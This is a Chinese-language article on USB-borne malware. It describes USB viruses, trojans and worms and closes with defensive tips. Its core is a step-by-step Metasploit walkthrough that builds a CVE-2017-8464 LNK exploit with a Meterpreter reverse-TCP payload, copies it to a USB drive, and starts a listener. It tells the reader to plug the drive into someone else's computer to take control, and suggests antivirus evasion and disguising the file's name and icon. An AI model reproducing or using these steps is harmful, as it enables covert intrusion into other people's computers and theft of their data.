U盘安全预警：警惕隐藏在U盘中的恶意软件

前言

在数字化时代，U盘成为了我们日常生活中不可或缺的存储设备之一。然而，正是因为其普遍性和便携性，U盘也成为了黑客们进行攻击的理想工具。通过利用各种技术手段，他们可以在U盘中隐藏恶意文件，或者直接从固件入手，在固件里植入恶意代码，从而获取用户的敏感信息或者破坏系统安全。这种攻击方式被称为“摆渡攻击”。下面将介绍两种常用的U盘攻击手段，希望大家能够了解相关技术，增强防范意识。

注意，以下教程仅供学习，请勿用于非法用途。

U盘攻击手段是指利用U盘进行的各种攻击手段，包括U盘病毒、U盘木马、U盘蠕虫等。U盘病毒是指感染U盘并通过U盘传播的恶意软件，它可以对计算机系统进行破坏、窃取数据、控制计算机等操作。U盘木马是指感染U盘并通过U盘自动执行恶意操作的程序，它可以隐藏在U盘中，等待用户插入U盘时自动运行。U盘蠕虫是指感染U盘并通过U盘传播的恶意程序，它可以自动复制自身到其他U盘或计算机中，不断扩散病毒。

以下是U盘攻击手段的常见类型及其特征：

1. U盘病毒：

   • 特征：U盘病毒通常会感染U盘并通过U盘传播，它可以感染计算机系统的可执行文件、文档、压缩文件等，并对系统进行破坏、窃取数据、控制计算机等操作。
   • 常见类型：U盘病毒通常会被包装成可执行文件、脚本文件或压缩文件，并在U盘中传播。一旦用户插入感染了病毒的U盘，病毒就会自动执行，对计算机系统进行破坏。

2. U盘木马：

   • 特征：U盘木马通常会感染U盘并通过U盘自动执行恶意操作，它可以隐藏在U盘中，等待用户插入U盘时自动运行。木马通常会尝试获取用户的密码、财务信息、个人数据等敏感信息，并将信息发送到攻击者的服务器上。
   • 常见类型：U盘木马通常会被包装成可执行文件、脚本文件或压缩文件，并在U盘中传播。一旦用户插入感染了木马的U盘，木马就会自动执行，并尝试获取用户的敏感信息。

3. U盘蠕虫：

   • 特征：U盘蠕虫通常会感染U盘并通过U盘传播，它可以自动复制自身到其他U盘或计算机中，不断扩散病毒。蠕虫通常会尝试获取用户的密码、财务信息、个人数据等敏感信息，并将信息发送到攻击者的服务器上。
   • 常见类型：U盘蠕虫通常会被包装成可执行文件、脚本文件或压缩文件，并在U盘中传播。一旦用户插入感染了蠕虫的U盘，蠕虫就会自动复制自身到其他U盘或计算机中，并尝试获取用户的敏感信息。

U盘文件病毒

原理：在U盘里放入病毒文件，当用户浏览病毒文件时发起攻击。

准备工具：一台电脑、Kali Linux系统  一个U盘（最好是空的）

启动msfconsole

msfconsole

搜索漏洞模块

search CVE-2017-8464

使用漏洞攻击模块

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

查看是否有需要填写的信息

查看是否有需要填写的信息

设置payload

set payload windows/meterpreter/reverse_tcp

填写LHOST，即攻击者机器的内网IP（一般都是本机的内网IP）

set lhost 192.168.X.XXX

运行攻击模块

exploit

在/root/.msf4/local/目录下会生成很多病毒文件（FlashPlayerCPLApp.cpl是主文件）

将以上所有文件都复制到U盘里（一般是根目录）

使用监听模块

use exploit/multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

填写LHOST（同上）

set lhost 192.168.X.XXX

运行监听模块

exploit

将U盘插入别人的电脑，点击FlashPlayerCPLApp.cpl文件后就可以获得目标电脑的控制权（如果对方电脑存在LNK漏洞的话，无需手动点击，只要浏览了FlashPlayerCPLApp.cpl所在文件夹就会自动运行病毒脚本）

可以通过shell直接操作对方的电脑

以上病毒文件都没有进行免杀，所以杀毒软件可以检测出来。如果进行了免杀并且修改了FlashPlayerCPLApp.cpl文件的文件名和图标等信息，完全可以达到深度伪装的效果

为了防止U盘攻击，用户应注意以下措施：

1. 不要插入未知来源的U盘，尤其是从网络上下载的U盘文件。
2. 定期对计算机进行安全扫描和病毒查杀，及时更新操作系统和应用程序的补丁，并安装防火墙和杀毒软件。
3. 不要打开从未知来源的电子邮件附件或下载的可执行文件，特别是U盘木马和U盘病毒。
4. 在使用U盘时，不要保存敏感数据，并定期格式化U盘，以防止U盘感染病毒和木马。
5. 如果发现U盘中有可疑文件，应立即删除并重新格式化U盘，并检查计算机系统中是否存在可疑程序或进程。

总之，U盘攻击手段具有较高的隐蔽性和破坏性，用户应提高安全意识，采取适当的防范措施，以保护自己的计算机系统和个人数据免受U盘攻击的威胁。

U盘攻击手段的防范措施是针对U盘病毒、木马和蠕虫等恶意软件的预防措施，包括及时更新操作系统和应用程序，安装防火墙和杀毒软件，定期扫描和查杀病毒，避免插入未知来源的U盘文件等。这些措施可以有效地保护计算机系统和个人数据免受U盘攻击的侵害。